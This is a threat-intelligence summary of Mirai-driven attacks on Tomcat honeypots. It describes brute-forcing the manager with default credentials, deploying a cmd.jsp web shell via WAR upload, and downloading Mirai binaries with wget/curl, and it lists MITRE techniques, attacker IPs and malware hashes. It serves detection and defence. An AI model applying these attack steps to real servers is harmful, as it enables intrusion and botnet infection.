Tomcat Under Attack: Exploring Mirai Malware and Beyond

An analysis of Tomcat honeypot attacks shows Mirai-driven campaigns dominated the activity, driven by misconfigurations and brute-force access to the Tomcat manager leading to web shells and remote code execution. Attackers deploy WAR files containing a cmd.jsp web shell, then download Mirai malware (e.g., l4sd4sx64) for cryptomining or DDoS, with ongoing evolution and detection by runtime CNDR tooling. hashtags #Tomcat #Mirai #cmd.jsp #neww #l4sd4sx64

Keypoints

Over two years, 800+ attacks on Tomcat honeypots targeted misconfigurations and weak credentials to deploy web shells enabling remote code execution.
Ppayload categories identified: Mirai botnet (primarily DDoS and cryptomining), cryptominers, and Chaos Malware (ransomware variant and newer DDoS tool).
Approximately 96% of attacks were linked to Mirai, with 152 attacks (~20%) dropping a shell script named “neww” from 24 unique IPs; about 68% originated from a single IP.
Tomcat misconfiguration, including default credentials (e.g., tomcat:tomcat) and the Tomcat manager’s access controlled by tomcat_users.xml, were common attack surfaces via brute-force.
Attack flow: brute-force gains access to the Tomcat web application manager, deploys a WAR with a malicious web shell (cmd.jsp), then downloads and executes Mirai components (e.g., l4sd4sx64) using wget/curl, chmod, and rm -rf.
MITRE-style defense evasion includes removing the command-history file in Linux to erase traces and hinder incident response.
Runtime detection by Aqua CNDR (eBPF in the Linux kernel) highlighted CNDR’s ability to capture these malicious actions in real time.

MITRE Techniques

[T1110] Brute Force – The threat actor attempted to gain access to the Tomcat web application manager by trying different combinations of credentials; ‘The threat actor scanned for Tomcat servers and launched a brute force attack against it, attempting to gain access to the Tomcat web application manager by trying different combinations of credentials.’
[T1078] Valid Accounts – Access to the web application manager was achieved on the third try using the correct combination of credentials; ‘succeeded in gaining access to the web application manager on the third try by using the correct combination of credentials.’
[T1505.003] Web Shell – A WAR file deployed contained a malicious web shell (cmd.jsp) to enable remote command execution; ‘the web shell ‘cmd.jsp’ has been flagged as malicious by 35 vendors on VirusTotal.’
[T1105] Ingress Tool Transfer – The malware was downloaded from a remote server using wget or curl; ‘Use the wget or curl command to download the malware from the remote server.’
[T1059] Command and Scripting Interpreter – The web shell listened for requests and executed commands on the server, enabling remote execution; ‘the web shell was designed to listen to requests and execute commands on the server.’
[T1036] Masquerading – The attacker used a legitimate action (upload a WAR file) via the Tomcat manager to masquerade the attack; ‘Using a legitimate action via the manager app (i.e., upload a WAR file) as an attack vector allows the threat actor to masquerade the attack.’
[T1070.004] Clear Linux Command History – The attacker attempted to delete the file storing the last 500 commands to erase traces; ‘remove the file that stores the command history of the last 500 commands entered by the logged-in user in Linux.’
[T1496] Resource Hijacking – Mirai-based cryptomining campaigns were a major impact of the attacks; ‘DDoS and cryptomining campaigns.’
[T1486] Data Encrypted for Impact – Chaos Malware is described as an upgraded ransomware variant and also used in DDoS-related activities; ‘Chaos Malware: an upgraded version of a ransomware variant…’.

Indicators of Compromise

[IP] Attacker IP – 104.248.157.218 (used for brute-force access attempts to Tomcat servers)
[Host] Malware host – 198.50.135.105 (hosting the Mirai payloads)
[SHA256] 0515cd2ba84a5da10c63cadae06f04d778d66c054b9184edb57be6ea95a1095b – cmd.jsp
[SHA256] 997f303c3696788923e41d35a26fc2c79a11ec34389028d81a6fb43f8c11aecf – neww
[SHA256] 0df529cbb87b51c91f4b98bfe4600627a8fce66ec12b8a3bad59fccf6779f679 – l4sd4sx64
[SHA256] 489ac3fdefac8d07e198c0c6346c9c9ae7c141a86ef3ec1720f61d171862a87a – l4sd4s86
[SHA256] 8ada5545b85c18d24a914e4b46f3275fca2d360ca5bfb91bf3ee4e7fde667065 – l4sd4sm4
[SHA256] 9d4963fa1b4d2bb576ac801c4a1efa5a0758d615aaa7d9cc5ae27f7955f67dee – l4sd4s8k
[SHA256] 35bb6ca1389fd3f4343090135ff11a69bc4315b1e46bd789301d675da813028d – l4sd4sm6
[SHA256] 2ee307971d8529b2a882b194b30d7e439db3d0b51ccbf5bf5fedb5deb1116606 – l4sd4sspc
[SHA256] ce718bf0fefb061bafd115639f6942b11ef3ac96e74a6b4fc19710e9e03a083a – l4sd4ssl
[SHA256] 5ee119fe3ce335200a2f029625bf9fa3ec495b8322093b59528029e1d6c9b69f – l4sd4sm5
[SHA256] a0fcc70704a49c38f1e7b9bbdc5fddd83ebd23da748b796d46e8211b86c5c3d6 – l4sd4sm7
[SHA256] bcc98241024fa6c1d0d1f2b48b9d4b9b8558de07621dcf109eaf9d18815018b8 – l4sd4spc
[SHA256] b0731816f2363f9afbfc05797ced85ce137b9fa7d8d92f423edd4ff32feeda2d – l4sd4sps
[SHA256] 696d3c58966d2e742cb02f34866d456413920fb83d3cb5ee49d285998167f6ff – l4sd4sh4
[SHA256] 690f7d22545b0c59fe638082bac2bc5fd35214008d5065bf773ea57f0bfd1789 – nmapunix.jsp
[SHA256] c086430aed0607ee6291402d16969a10ba8aaab81421aa5fae5085e3b5dd56bb – sc.jsp
[SHA256] d0ad85e652e2c6091af6f347aef9e918c954580609f715e376226edd12b5bc15 – 6888.jsp
[SHA256] 5407cc0b19573b6c807b7fcb188aa3af3e762cf9c65379cd8f70d815f89283dc – index.jsp
[SHA256] 7b108418d450682e2c7f1acbef0e546a622bb73e829682fdbcc0dc8fc3e4876f – 7.jsp
[SHA256] 4c2969c6f81043985c73547096498df064ca2d8e77c5d9ec8a47925a77ce776b – win.jsp
[SHA256] 99b96d232693a7de6899e47b0da66af59a7eb7cbc3b9fadd8b88039e714e23f1 – cmd.jsp
[SHA256] 6eadfab5438dc777b4abff3bee5d6d8d0043ea2cfade18af1e71eae16f3b0bd2 – test03.jsp
[SHA256] 11bcad6663b6ba025c4d9b6e80dbc5d5f103c5b9977ff8f138ca1c8486b7e0a7 – _sysrv_int.jsp
[SHA256] 519dd6c3d0e5e022c63ad7b892f5ac51e6dc9d047c03e91510b4bcbabea24d58 – _bd.jsp